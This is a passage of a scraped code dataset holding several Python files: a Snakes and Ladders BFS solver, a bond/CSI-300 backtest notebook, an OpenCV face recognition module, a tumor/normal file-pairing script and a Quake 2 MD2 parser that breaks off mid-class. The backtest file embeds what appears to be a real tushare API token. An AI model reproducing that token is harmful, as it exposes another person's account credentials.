10)\n y = (i % 10) - 1\n else:\n y = 9\n x = int(i / 10) - 1\n value_at_position = [board[x][y], value[1] + 1]\n visited[i] = True\n neighbors.append(value_at_position)\n if value_at_position[0] == 100:\n return value_at_position[1]\n else:\n break\n if not visited[100]:\n return -1\n return value[1]\n\n\ndef main():\n T = int(input())\n for cases in range(T):\n board = []\n\n # Creating the board for the game\n count = 0\n for i in range(10):\n templist = []\n for j in range(10):\n count += 1\n templist.insert(count, count)\n board.append(templist)\n\n ladders = int(input())\n\n # Adding ladders to the board\n for i in range(ladders):\n num = input().split(\" \")\n position = int(num[0])\n x = int(position / 10)\n y = (position % 10) - 1\n board[x][y] = int(num[1])\n\n snakes = int(input())\n\n # Adding Snakes to the board\n for i in range(snakes):\n num = input().split(\" \")\n position = int(num[0])\n x = int(position / 10)\n y = (position % 10) - 1\n board[x][y] = int(num[1])\n\n print(bfs(board))\n\nif __name__ == '__main__':\n main()","sub_path":"HackerRankProblems/src/SnakesAndLadders.py","file_name":"SnakesAndLadders.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"604338750","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 17 23:22:00 2021\n\n@author: xingxing\n\"\"\"\n\nfrom src.common import *\n\n# ================简单组合策略 15% - 85%====================\n\nguozhai = pd.read_csv('data/000012.csv', encoding='gbk')\nhs_300 = pd.read_csv('data/000300.csv', encoding='gbk')\n\n\nguozhai = pd.read_csv('data/217011.csv')\nguozhai = guozhai.set_index('净值日期').sort_index()\n\nhs_300.set_index('日期', inplace=True)\nhs_300.sort_index(inplace=True)\n\ntotal = pd.concat([guozhai['累计净值'].rename('债券'), hs_300.收盘价.rename('沪深300')], axis = 1)\n\ntotal.sort_index(inplace=True)\n\ntotal_2015 = total[total.index >= '2015-01-01']\n\ntotal_2015 = total_2015.dropna()\n\ntotal_2015\n\npnl = simple_holding_strategy_balance(total_2015, np.array([0.85, 0.15]))\n\nget_annual_return(pnl)\nget_max_drawdown(pnl)\nget_mar(pnl)\n\nplt.plot(pnl)\n\n'''\nget_annual_return(pnl)\nOut[40]: 0.047026454832702624\n\nget_max_drawdown(pnl)\nOut[41]: 0.10226021189244701\n\nget_mar(pnl)\nOut[42]: 0.45987050058299384\n'''\n\n# ============================================\n\nguozhai_rate = pd.read_csv('data/中国十年期国债收益率历史数据.csv')\n\nguozhai_rate\n\ndef to_time_str(date):\n year_index = date.find('年')\n month_index= date.find('月')\n day_index = date.find('日')\n # print(year_index, month_index, day_index)\n year = int(date[0:year_index])\n month = int(date[year_index+1:month_index])\n day = int(date[month_index+1:day_index])\n date = datetime.datetime(year, month, day).strftime('%Y-%m-%d')\n return date\n\nguozhai_rate['date'] = guozhai_rate['日期'].apply(to_time_str)\nguozhai_rate.set_index('date', inplace=True)\nguozhai_rate.sort_index(inplace=True)\n\nguozhai_rate\n\nguozhai_rate.收盘.plot(figsize=(16, 9))\n\nts.set_token('ec4caba8049b4697b0d6006052c0ac3c6aae5ce8927463b296cbd2d6')\n\npro = ts.pro_api()\n\nhs300_pe = pd.read_csv(r'data/000300_pe.csv')\nhs300_pe.head()\n\nhs300_pe.set_index('trade_date', inplace=True)\n\nhs300_pe.plot(subplots=True)\n\nindicator_股债性价比 = pd.concat([hs300_pe.pe_ttm.rename('pe'), guozhai_rate.收盘.rename('利率')], axis=1)\n\nindicator_股债性价比.sort_index(inplace=True)\n\nindicator_股债性价比['股债性价比'] = (1.0 / indicator_股债性价比.pe) / indicator_股债性价比.利率\n\nindicator_股债性价比.股债性价比.plot(figsize = (16, 9))\n\nindicator_股债性价比.info()\n\nindicator_股债性价比.shape\n\n\npd.concat([indicator_股债性价比.股债性价比, hs_300.收盘价], axis = 1).sort_index().dropna().plot(figsize=(16, 9), subplots=True)\n\n\nindicator_股债性价比.股债性价比\ndata_股债性价比 = total_2015.copy()\ndata_股债性价比['cash'] = 1\ndata_股债性价比\n\ndef is_balance_day(today, yesterday):\n today = get_datetime_from_str(today).month\n yesterday = get_datetime_from_str(yesterday).month\n if today != yesterday:\n return True\n \n return False\n\n# 债券 股票 现金\ns_w = np.array([0, 0, 1])\ns_ret = np.array([])\n\nfor i in np.arange(0, total_2015.shape[0]):\n if i == 0:\n s_w = np.array([0, 0, 1])\n s_ret = np.append(s_ret, 1)\n continue\n else:\n yd_md = data_股债性价比.values[i-1, ]\n td_md = data_股债性价比.values[i, ]\n s_rtn = td_md / yd_md\n \n s_w = s_w * s_rtn\n s_ret = np.append(s_ret, s_w.sum())\n \n if is_balance_day(data_股债性价比.index[i], data_股债性价比.index[i-1]):\n print(data_股债性价比.index[i])\n cur_股债性价比 = indicator_股债性价比.股债性价比[data_股债性价比.index[i]]\n cur_ret = s_ret[-1]\n \n zhaiquan_ratio = cur_ret * 0.8\n gupiao_ratio = (cur_ret - zhaiquan_ratio) * ((cur_股债性价比 - 0.015) / (0.035 - 0.015))\n cash_ratio = cur_ret - zhaiquan_ratio - gupiao_ratio\n \n s_w = np.array([zhaiquan_ratio, gupiao_ratio, cash_ratio])\n print(s_w)\n # print(s_w)\n \nget_annual_return(s_ret)\nget_max_drawdown(s_ret)\nget_mar(s_ret)\n","sub_path":"src/.ipynb_checkpoints/固收+-checkpoint.py","file_name":"固收+-checkpoint.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"243411600","text":"# Detects face and fingers and does facial recognition using openCV\n\nimport module_manager\nmodule_manager.review()\n\nimport cv2 \nimport numpy as np\nimport math\nimport os\nfrom PIL import Image\n\n\"\"\"Used method to detect face from this tutorial\nhttps://docs.opencv.org/3.4.1/d7/d8b/tutorial_py_face_detection.html\"\"\"\n\n# xml files describing our haar cascade classifiers\nfaceCascadeFilePath = \"haarcascade_frontalface_default.xml\"\n# Build our cv2 Cascade Classifiers\nfaceCascade = cv2.CascadeClassifier(faceCascadeFilePath)\n# Collect video input from first webcam on system\ncap = cv2.VideoCapture(1)\n# Creates the recognizer which is used for facial recognition\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\n\ndef returnFaces():\n \n while True:\n \n # Reads image\n ret, frame = cap.read()\n # Converts image to grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # Detects face in the captured frame\n faces = faceCascade.detectMultiScale(gray, 1.3, 5)\n # If any faces detected, returns True\n for (x, y, w, h) in faces:\n return True\n return False\n\n\"\"\"Followed this tutorial to detect hand and return number of fingers\nhttps://www.quora.com/What-is-the-easiest-way-to-recognise-gestures-in-\nOpenCV-using-Python\"\"\"\n\ndef returnFingers():\n \n try:\n while(cap.isOpened()):\n \n # Read images\n ret, img = cap.read()\n # Creates a small sub window in top right corner to look for hands\n cv2.rectangle(img, (300,300), (100,100), (0,255,0),0)\n crop_img = img[100:300, 100:300]\n # Converts image to grayscale\n gray = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)\n # Applys a blur so difference in colors is easier to detect\n blurSize = (35, 35)\n blurred = cv2.GaussianBlur(gray, blurSize, 0)\n # Thresholds image using Otsu's Binarization method\n _, thresh1 = cv2.threshold(blurred, 127, 255,\n cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n # UNCOMMENT TO DEBUG AND VIEW THRESHOLDED IMAGE IN ANOTHER WINDOW\n #cv2.imshow('Thresholded', thresh1)\n image, contours, hierarchy = cv2.findContours(thresh1.copy(), \\\n cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n # Finds the contour with max area\n cnt = max(contours, key = lambda x: cv2.contourArea(x))\n # Finds convex hull\n hull = cv2.convexHull(cnt)\n # Drawing contours\n drawing = np.zeros(crop_img.shape,np.uint8)\n cv2.drawContours(drawing, [cnt], 0, (0, 255, 0), 0)\n cv2.drawContours(drawing, [hull], 0,(0, 0, 255), 0)\n # Finds convex hull\n hull = cv2.convexHull(cnt, returnPoints=False)\n # Finds convexity defects\n defects = cv2.convexityDefects(cnt, hull)\n countDefects = 0\n cv2.drawContours(thresh1, contours, -1, (0, 255, 0), 3)\n \n # Applies Cosine Rule to find angle for all defects between fingers\n for i in range(defects.shape[0]):\n s,e,f,d = defects[i,0]\n \n start = tuple(cnt[s][0])\n end = tuple(cnt[e][0])\n far = tuple(cnt[f][0])\n \n # Finds the length of all sides of triangle\n a = math.sqrt((end[0] - start[0])**2 + (end[1] - start[1])**2)\n b = math.sqrt((far[0] - start[0])**2 + (far[1] - start[1])**2)\n c = math.sqrt((end[0] - far[0])**2 + (end[1] - far[1])**2)\n \n # Applies the cosine rule \n angle = math.acos((b**2 + c**2 - a**2)/(2*b*c)) * 57\n \n # ignore angles > 90 and highlight rest with red dots\n if angle <= 90:\n countDefects += 1\n cv2.circle(crop_img, far, 1, [0,0,255], -1)\n #dist = cv2.pointPolygonTest(cnt,far,True)\n \n # Number of count defects is one less than the number of fingers\n if 1 <= countDefects <= 4:\n return (countDefects + 1)\n # Either one finger or nothing detected\n else:\n return 0 \n\n # Avoids crashing of program if it cannot detect any shapes \n except Exception as e:\n print(\"crashed\")\n return 0 \n \n\"\"\"Watched this YouTube video to train and recognize faces\n https://www.youtube.com/watch?v=4W5M-YaJtIA&t=57s\"\"\"\n \ndef datasetGenerator(id):\n \n # Names files with users inputted name\n name = input(\"Enter your name:\")\n sampleNum = 0\n maxImages = 20\n \n while True:\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = faceCascade.detectMultiScale(gray, 1.3, 5)\n for (x, y, w, h) in faces:\n sampleNum += 1\n # Saves the captured images in the dataset folder using users id\n cv2.imwrite(\"trainer/User\" + \".\" + str(name) + \".\" + str(id) + \".\" + str(sampleNum) + \".jpg\", gray[y:y+h,x:x+w])\n # Takes a photo every 100 ms\n cv2.waitKey(100)\n cv2.waitKey(1)\n # Takes twenty smaple pics of each user\n if sampleNum >= maxImages:\n return name\n \ndef getImagesAndLabels(path):\n \n # Get the path of each file in the folder\n imagePaths = [os.path.join(path,file) for file in os.listdir(path)]\n faceSamples, ids = [], []\n \n for path in imagePaths:\n # Loads the image and converts it to grayscale\n pilImage = Image.open(path).convert(\"L\")\n # Converts PIL image into a numpy array\n array = np.array(pilImage, \"uint8\")\n # Gets the the user's name from the image\n id = int(os.path.split(path)[-1].split(\".\")[2])\n faceSamples.append(array)\n ids.append(id)\n # Extracts a face from the image samples \n faces = faceCascade.detectMultiScale(array)\n return (faceSamples, ids)\n\nfaces, ids = getImagesAndLabels(\"trainer\")\nrecognizer.train(faces, np.array(ids))\nrecognizer.save(\"recognizer/trainingData.yml\")\n\n# Takes in a dictionary of ids to users and matches them\ndef recognizeFace(users):\n \n while True:\n name = \"\"\n # Reads image\n ret, frame = cap.read()\n # Converts image to grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # Detects face in the captured frame\n faces = faceCascade.detectMultiScale(gray, 1.2, 5)\n # If any faces detected, returns True\n for (x, y, w, h) in faces:\n # Uses the recognizer to predict user\n id, conf = recognizer.predict(gray[y:y+h,x:x+w])\n # If id found should be in dict but checks to avoid errors\n if str(id) in users:\n name = users[str(id)]\n # If id not detected uses \"User\" as the generic name\n else:\n name = \"User\"\n return name\n \n","sub_path":"openCV.py","file_name":"openCV.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"294288385","text":"#!/usr/bin/env python\ndescription = '''\nGiven a list of files as a single column list, \nthis program tries to figure out how they pair up\nto make a normal/tumor pair, assuming pairs exist\nwithin the input.\n\nOutput the resulting pairs in the following format:\n\nColumns:\nnormal_filename\ntumor_filename\n'''\n\nimport argparse\nimport re\nimport sys\n\nPATTERNS = (('_N','_T'),\n ('N_','T_'),\n ('_N_','_T_'),\n ('-N','-T'),\n ('N-','T-'),\n ('-N-','-T-'),\n ('.N','.T'),\n ('N.','T.'),\n ('.N.','.T.'))\n\ndef check_pattern(pattern, filenames_list):\n '''\n Given a pattern in PATTERNS, check\n if the pattern exists in filenames_list.\n If the pattern causes the filenames to divide\n in half, return True\n Otherwise, return False\n '''\n # Divide up the files\n n_files = []\n t_files = []\n for filename in filenames_list:\n match_n = re.search(pattern[0] ,filename)\n match_t = re.search(pattern[1], filename)\n if match_n and not match_t:\n n_files.append(filename)\n elif not match_n and match_t:\n t_files.append(filename)\n \n # If all the files divided up evenly, then pattern works\n len_n_files = len(n_files)\n len_t_files = len(t_files)\n\n # All files were divided evenly\n if len_n_files == len_t_files:\n if len_n_files + len_t_files == len(filenames_list):\n sys.stderr.write('Pattern %s divided up the files evenly\\n' % str(pattern))\n return n_files, t_files\n\n # Files were divided unevenly\n elif len_n_files > 0 and len_t_files > 0:\n if len_n_files + len_t_files == len(filenames_list):\n sys.stderr.write('Pattern %s divided up the files unevenly\\n' % str(pattern))\n return n_files, t_files\n \n return False\n\ndef search_matching_tumorfile(normalfile, tumorfiles, pattern):\n '''\n Given a normal filename, find the matching tumor file\n '''\n nf = normalfile.replace(pattern[0], pattern[1])\n nf = re.sub(r'_[ACGT]{6}_', '_.{4}_', nf)\n nf = re.sub(r'_L.{3}_', '_L..._', nf)\n for tf in tumorfiles: \n result = re.search(nf, tf)\n if result:\n return tf\n return False\n\ndef detect_pairs(samplenames):\n '''\n Figure out the N and T pairs from a list of filenames\n and return the pairs as a list of tuples, i.e.\n [(Sample1_N.bam, Sample1_T.bam),\n (Sample2_N.bam, Sample2_T.bam),\n (Sample3_N.bam, Sample3_T.bam)]\n '''\n \n # Check each pattern in PATTERNS against the filenames\n for pattern in PATTERNS:\n check_result = check_pattern(pattern, samplenames)\n\n # Files divided up either evenly or unevenly\n if check_result:\n normal_files = sorted(check_result[0])\n tumor_files = sorted(check_result[1])\n\n # Generate the matching pairs\n matched_pairs = []\n for n_file in normal_files:\n t_file = search_matching_tumorfile(n_file, tumor_files, pattern)\n if t_file:\n matched_pairs.append((n_file,t_file))\n \n # Check to make sure that the ordered files are matched up\n return matched_pairs\n\n # None of the patterns worked\n return False\n\ndef main():\n # Set up parameter options\n ap = argparse.ArgumentParser(description=description)\n ap.add_argument('input_file',\n help='Single column list of files',\n nargs='?',\n type=argparse.FileType('r'),\n default=sys.stdin)\n params = ap.parse_args()\n\n # Read all filenames into a list\n filenames = []\n for line in params.input_file:\n fname = line.strip().split()[0]\n filenames.append(fname)\n params.input_file.close()\n\n # Detect sample ids from filenames and map them\n sampleid2filename = {}\n for filename in filenames:\n # Look for index in the filename\n match = re.search(r'(.+)[ACTG]{6}', filename)\n if match:\n sampleid = match.group(1)\n sampleid2filename[sampleid] = filename\n continue\n # Look for lane number in the filename\n match = re.search(r'(.+)L\\d{3}', filename)\n if match:\n sampleid = match.group(1)\n sampleid2filename[sampleid] = filename\n continue\n\n # No match indicates index and lane number are not present in the filename\n sampleid2filename[filename] = filename\n\n # Detect the paired filenames\n pairs = detect_pairs(sorted(sampleid2filename.keys()))\n\n # Could not detect pairs\n if not pairs:\n sys.stderr.write('Could not detect paired files.\\n')\n sys.exit(1)\n\n # Output to standard output\n for pair in pairs:\n normal_file = sampleid2filename[pair[0]]\n tumor_file = sampleid2filename[pair[1]]\n sys.stdout.write('%s\\t%s\\n' % (normal_file, tumor_file))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"modules/somatic/detect_normal_tumor_pairs.py","file_name":"detect_normal_tumor_pairs.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"494694258","text":"\"\"\"This module provides file I/O for Quake 2 BSP map files.\n\nExample:\n bsp_file = bsp.Bsp.open('base1.bsp')\n\nReferences:\n Quake 2 Source\n - id Software\n - https://github.com/id-Software/Quake-2\n\"\"\"\n\nimport io\nimport struct\n\nfrom types import SimpleNamespace\n\n__all__ = ['BadMd2File', 'is_md2file', 'Md2']\n\n\nclass BadMd2File(Exception):\n pass\n\n\ndef _check_md2file(fp):\n fp.seek(0)\n data = fp.read(struct.calcsize('<4si'))\n identity, version = struct.unpack('<4si', data)\n\n return identity == b'IDP2' and version == 8\n\n\ndef is_md2file(filename):\n \"\"\"Quickly see if a file is a bsp file by checking the magic number.\n\n The filename argument may be a file for file-like object.\n \"\"\"\n result = False\n\n try:\n if hasattr(filename, 'read'):\n return _check_md2file(fp=filename)\n else:\n with open(filename, 'rb') as fp:\n return _check_md2file(fp)\n\n except:\n pass\n\n return result\n\nvertex_normals = (\n (-0.525731, 0.000000, 0.850651),\n (-0.442863, 0.238856, 0.864188),\n (-0.295242, 0.000000, 0.955423),\n (-0.309017, 0.500000, 0.809017),\n (-0.162460, 0.262866, 0.951056),\n (0.000000, 0.000000, 1.000000),\n (0.000000, 0.850651, 0.525731),\n (-0.147621, 0.716567, 0.681718),\n (0.147621, 0.716567, 0.681718),\n (0.000000, 0.525731, 0.850651),\n (0.309017, 0.500000, 0.809017),\n (0.525731, 0.000000, 0.850651),\n (0.295242, 0.000000, 0.955423),\n (0.442863, 0.238856, 0.864188),\n (0.162460, 0.262866, 0.951056),\n (-0.681718, 0.147621, 0.716567),\n (-0.809017, 0.309017, 0.500000),\n (-0.587785, 0.425325, 0.688191),\n (-0.850651, 0.525731, 0.000000),\n (-0.864188, 0.442863, 0.238856),\n (-0.716567, 0.681718, 0.147621),\n (-0.688191, 0.587785, 0.425325),\n (-0.500000, 0.809017, 0.309017),\n (-0.238856, 0.864188, 0.442863),\n (-0.425325, 0.688191, 0.587785),\n (-0.716567, 0.681718, -0.147621),\n (-0.500000, 0.809017, -0.309017),\n (-0.525731, 0.850651, 0.000000),\n (0.000000, 0.850651, -0.525731),\n (-0.238856, 0.864188, -0.442863),\n (0.000000, 0.955423, -0.295242),\n (-0.262866, 0.951056, -0.162460),\n (0.000000, 1.000000, 0.000000),\n (0.000000, 0.955423, 0.295242),\n (-0.262866, 0.951056, 0.162460),\n (0.238856, 0.864188, 0.442863),\n (0.262866, 0.951056, 0.162460),\n (0.500000, 0.809017, 0.309017),\n (0.238856, 0.864188, -0.442863),\n (0.262866, 0.951056, -0.162460),\n (0.500000, 0.809017, -0.309017),\n (0.850651, 0.525731, 0.000000),\n (0.716567, 0.681718, 0.147621),\n (0.716567, 0.681718, -0.147621),\n (0.525731, 0.850651, 0.000000),\n (0.425325, 0.688191, 0.587785),\n (0.864188, 0.442863, 0.238856),\n (0.688191, 0.587785, 0.425325),\n (0.809017, 0.309017, 0.500000),\n (0.681718, 0.147621, 0.716567),\n (0.587785, 0.425325, 0.688191),\n (0.955423, 0.295242, 0.000000),\n (1.000000, 0.000000, 0.000000),\n (0.951056, 0.162460, 0.262866),\n (0.850651, -0.525731, 0.000000),\n (0.955423, -0.295242, 0.000000),\n (0.864188, -0.442863, 0.238856),\n (0.951056, -0.162460, 0.262866),\n (0.809017, -0.309017, 0.500000),\n (0.681718, -0.147621, 0.716567),\n (0.850651, 0.000000, 0.525731),\n (0.864188, 0.442863, -0.238856),\n (0.809017, 0.309017, -0.500000),\n (0.951056, 0.162460, -0.262866),\n (0.525731, 0.000000, -0.850651),\n (0.681718, 0.147621, -0.716567),\n (0.681718, -0.147621, -0.716567),\n (0.850651, 0.000000, -0.525731),\n (0.809017, -0.309017, -0.500000),\n (0.864188, -0.442863, -0.238856),\n (0.951056, -0.162460, -0.262866),\n (0.147621, 0.716567, -0.681718),\n (0.309017, 0.500000, -0.809017),\n (0.425325, 0.688191, -0.587785),\n (0.442863, 0.238856, -0.864188),\n (0.587785, 0.425325, -0.688191),\n (0.688191, 0.587785, -0.425325),\n (-0.147621, 0.716567, -0.681718),\n (-0.309017, 0.500000, -0.809017),\n (0.000000, 0.525731, -0.850651),\n (-0.525731, 0.000000, -0.850651),\n (-0.442863, 0.238856, -0.864188),\n (-0.295242, 0.000000, -0.955423),\n (-0.162460, 0.262866, -0.951056),\n (0.000000, 0.000000, -1.000000),\n (0.295242, 0.000000, -0.955423),\n (0.162460, 0.262866, -0.951056),\n (-0.442863, -0.238856, -0.864188),\n (-0.309017, -0.500000, -0.809017),\n (-0.162460, -0.262866, -0.951056),\n (0.000000, -0.850651, -0.525731),\n (-0.147621, -0.716567, -0.681718),\n (0.147621, -0.716567, -0.681718),\n (0.000000, -0.525731, -0.850651),\n (0.309017, -0.500000, -0.809017),\n (0.442863, -0.238856, -0.864188),\n (0.162460, -0.262866, -0.951056),\n (0.238856, -0.864188, -0.442863),\n (0.500000, -0.809017, -0.309017),\n (0.425325, -0.688191, -0.587785),\n (0.716567, -0.681718, -0.147621),\n (0.688191, -0.587785, -0.425325),\n (0.587785, -0.425325, -0.688191),\n (0.000000, -0.955423, -0.295242),\n (0.000000, -1.000000, 0.000000),\n (0.262866, -0.951056, -0.162460),\n (0.000000, -0.850651, 0.525731),\n (0.000000, -0.955423, 0.295242),\n (0.238856, -0.864188, 0.442863),\n (0.262866, -0.951056, 0.162460),\n (0.500000, -0.809017, 0.309017),\n (0.716567, -0.681718, 0.147621),\n (0.525731, -0.850651, 0.000000),\n (-0.238856, -0.864188, -0.442863),\n (-0.500000, -0.809017, -0.309017),\n (-0.262866, -0.951056, -0.162460),\n (-0.850651, -0.525731, 0.000000),\n (-0.716567, -0.681718, -0.147621),\n (-0.716567, -0.681718, 0.147621),\n (-0.525731, -0.850651, 0.000000),\n (-0.500000, -0.809017, 0.309017),\n (-0.238856, -0.864188, 0.442863),\n (-0.262866, -0.951056, 0.162460),\n (-0.864188, -0.442863, 0.238856),\n (-0.809017, -0.309017, 0.500000),\n (-0.688191, -0.587785, 0.425325),\n (-0.681718, -0.147621, 0.716567),\n (-0.442863, -0.238856, 0.864188),\n (-0.587785, -0.425325, 0.688191),\n (-0.309017, -0.500000, 0.809017),\n (-0.147621, -0.716567, 0.681718),\n (-0.425325, -0.688191, 0.587785),\n (-0.162460, -0.262866, 0.951056),\n (0.442863, -0.238856, 0.864188),\n (0.162460, -0.262866, 0.951056),\n (0.309017, -0.500000, 0.809017),\n (0.147621, -0.716567, 0.681718),\n (0.000000, -0.525731, 0.850651),\n (0.425325, -0.688191, 0.587785),\n (0.587785, -0.425325, 0.688191),\n (0.688191, -0.587785, 0.425325),\n (-0.955423, 0.295242, 0.000000),\n (-0.951056, 0.162460, 0.262866),\n (-1.000000, 0.000000, 0.000000),\n (-0.850651, 0.000000, 0.525731),\n (-0.955423, -0.295242, 0.000000),\n (-0.951056, -0.162460, 0.262866),\n (-0.864188, 0.442863, -0.238856),\n (-0.951056, 0.162460, -0.262866),\n (-0.809017, 0.309017, -0.500000),\n (-0.864188, -0.442863, -0.238856),\n (-0.951056, -0.162460, -0.262866),\n (-0.809017, -0.309017, -0.500000),\n (-0.681718, 0.147621, -0.716567),\n (-0.681718, -0.147621, -0.716567),\n (-0.850651, 0.000000, -0.525731),\n (-0.688191, 0.587785, -0.425325),\n (-0.587785, 0.425325, -0.688191),\n (-0.425325, 0.688191, -0.587785),\n (-0.425325, -0.688191, -0.587785),\n (-0.587785, -0.425325, -0.688191),\n (-0.688191, -0.587785, -0.425325)\n)\n\n\nclass Header:\n \"\"\"Class for representing a Md2 file header\"\"\"\n format = \"<4s16i\"\n size = struct.calcsize(format)\n\n def __init__(self,\n identity,\n version,\n skin_width,\n skin_height,\n frame_size,\n number_of_skins,\n number_of_vertexes,\n number_of_st_vertexes,\n number_of_triangles,\n number_of_gl_commands,\n number_of_frames,\n skin_offset,\n st_vertex_offset,\n triangle_offset,\n frame_offset,\n gl_command_offset,\n end_offset):\n\n self.identity = identity\n self.version = version\n self.skin_width = skin_width\n self.skin_height = skin_height\n self.frame_size = frame_size\n self.number_of_skins = number_of_skins\n self.number_of_vertexes = number_of_vertexes\n self.number_of_st_vertexes = number_of_st_vertexes\n self.number_of_triangles = number_of_triangles\n self.number_of_gl_commands = number_of_gl_commands\n self.number_of_frames = number_of_frames\n self.skin_offset = skin_offset\n self.st_vertex_offset = st_vertex_offset\n self.triangle_offset = triangle_offset\n self.frame_offset = frame_offset\n self.gl_command_offset = gl_command_offset\n self.end_offset = end_offset\n\n @classmethod\n def write(cls, file, header):\n header_data = struct.pack(cls.format,\n header.identity,\n header.version,\n header.skin_width,\n header.skin_height,\n header.frame_size,\n header.number_of_skins,\n header.number_of_vertexes,\n header.number_of_st_vertexes,\n header.number_of_triangles,\n header.number_of_gl_commands,\n header.number_of_frames,\n header.skin_offset,\n header.st_vertex_offset,\n header.triangle_offset,\n header.frame_offset,\n header.gl_command_offset,\n header.end_offset)\n\n file.write(header_data)\n\n @classmethod\n def read(cls, file):\n header_data = file.read(cls.size)\n header_struct = struct.unpack(cls.format, header_data)\n\n return Header(*header_struct)\n\n\nclass Skin:\n format = '<64s'\n size = struct.calcsize(format)\n\n @classmethod\n def write(cls, file, skin):\n skin_data = struct.pack(cls.format, skin.encode('ascii'))\n\n file.write(skin_data)\n\n @classmethod\n def read(cls, file):\n skin_data = file.read(cls.size)\n skin_struct = struct.unpack(cls.format, skin_data)\n\n return skin_struct[0].split(b'\\00')[0].decode('ascii')\n\n\nclass Skins:\n Class = Skin\n\n @classmethod\n def write(cls, file, skins):\n for skin in skins:\n cls.Class.write(file, skin)\n\n @classmethod\n def read(cls, file):\n return [c[0].split(b'\\00')[0].decode('ascii') for c in struct.iter_unpack(cls.Class.format, file.read())]\n\n\nclass TriVertex:\n \"\"\"Class for representing a trivertex\n\n A TriVertex is a set of XYZ coordinates and a light normal index.\n\n Note:\n The XYZ coordinates are packed into a (0, 0, 0) to (255, 255, 255)\n local space. The actual position can be calculated:\n\n position = (packed_vertex * frame.scale) + frame.translate\n\n Note:\n The light normal index is an index into a set of pre-calculated normal\n vectors. These can be found in the vertex_normals attribute of this\n module.\n\n Attributes:\n x: The x-coordinate\n\n y: The y-coordinate\n\n z: The z-coordinate\n\n light_normal_index: The index for the pre-calculated normal vector of\n this vertex used for lighting.\n \"\"\"\n\n format = '<4B'\n size = struct.calcsize(format)\n\n __slots__ = (\n 'x',\n 'y',\n 'z',\n 'light_normal_index'\n )\n\n def __init__(self,\n x,\n y,\n z,\n light_normal_index):\n\n self.x = x\n self.y = y\n self.z = z\n self.light_normal_index = light_normal_index\n\n def __getitem__(self, key):\n if type(key) is int:\n return [self.x, self.y, self.z][key]\n\n elif type(key) is slice:\n start = key.start or 0\n stop = key.stop or 3\n\n return [self.x, self.y, self.z][start:stop]\n\n def __setitem__(self, key, value):\n if type(key) is int:\n if key == 0:\n self.x = value\n elif key == 1:\n self.y = value\n elif key == 2:\n self.z = value\n else:\n raise IndexError('list index out of range')\n\n elif type(key) is slice:\n start = key.start or 0\n stop = key.stop or 3\n\n for i in range(start, stop):\n self[i] = value[i]\n\n @classmethod\n def write(cls, file, tri_vertex):\n tri_vertex_data = struct.pack(cls.format,\n tri_vertex.x,\n tri_vertex.y,\n tri_vertex.z,\n tri_vertex.light_normal_index)\n\n file.write(tri_vertex_data)\n\n @classmethod\n def read(cls, file):\n tri_vertex_data = file.read(cls.size)\n tri_vertex_struct = struct.unpack(cls.format, tri_vertex_data)\n\n return TriVertex(*tri_vertex_struct)\n\n\nclass StVertex:\n \"\"\"Class for representing an st vertex\n\n StVertices are similar to UV coordinates but are expressed in terms of\n surface space and span (0,0) to (texture_width, texture_height).\n\n Note:\n If an StVertex lies on a seam and belongs to a back facing triangle,\n the s-component must be incremented by half of the skin width.\n\n Attributes:\n s: The x-coordinate on the skin.\n\n t: The y-coordinate on the skin.\n \"\"\"\n\n format = '<2h'\n size = struct.calcsize(format)\n count = 1\n\n __slots__ = (\n 's',\n 't'\n )\n\n def __init__(self,\n s,\n t):\n\n self.s = s\n self.t = t\n\n def __getitem__(self, key):\n if type(key) is int:\n return [self.s, self.t][key]\n\n elif type(key) is slice:\n start = key.start or 0\n stop = key.stop or 2\n\n return [self.s, self.t][start:stop]\n\n def __setitem__(self, key, value):\n if type(key) is int:\n if key == 0:\n self.s = value\n elif key == 1:\n self.t = value\n else:\n raise IndexError('list index out of range')\n\n elif type(key) is slice:\n start = key.start or 0\n stop = key.stop or 2\n\n for i in range(start, stop):\n self[i] = value[i]\n\n @classmethod\n def write(cls, file, st_vertex):\n st_vertex_data = struct.pack(cls.format,\n st_vertex.s,\n st_vertex.t)\n\n file.write(st_vertex_data)\n\n @classmethod\n def read(cls, file):\n st_vertex_data = file.read(cls.size)\n st_vertex_struct = struct.unpack(cls.format, st_vertex_data)\n\n return StVertex(*st_vertex_struct)\n\n\nclass StVertexes:\n Class = StVertex\n\n @classmethod\n def write(cls, file, st_vertexes):\n for st_vertex in st_vertexes:\n cls.Class.write(file, st_vertex)\n\n @classmethod\n def read(cls, file):\n return [cls.Class(*st) for st in struct.iter_unpack(cls.Class.format, file.read())]\n\n\nclass Triangle:\n \"\"\"Class for representing a triangle\n\n Note:\n The triangle winding direction is clockwise.\n\n Attributes:\n vertexes: A triple of vertex indexes. XYZ data can be obtained by\n indexing into the frame.vertexes attribute.\n \"\"\"\n\n format = '<6h'\n size = struct.calcsize(format)\n\n __slots__ = (\n 'vertexes',\n 'st_vertexes'\n )\n\n def __init__(self,\n vertex_0,\n vertex_1,\n vertex_2,\n st_vertex_0,\n st_vertex_1,\n st_vertex_2):\n\n self.vertexes = [vertex_0, vertex_1, vertex_2]\n self.st_vertexes = [st_vertex_0, st_vertex_1, st_vertex_2]\n\n def __getitem__(self, key):\n return self.vertexes[key]\n\n def __setitem__(self, key, value):\n self.vertexes[key] = value\n\n @classmethod\n def write(cls, file, triangle):\n triangle_data = struct.pack(cls.format,\n *triangle.vertexes,\n *triangle.st_vertexes)\n\n file.write(triangle_data)\n\n @classmethod\n def read(cls, file):\n 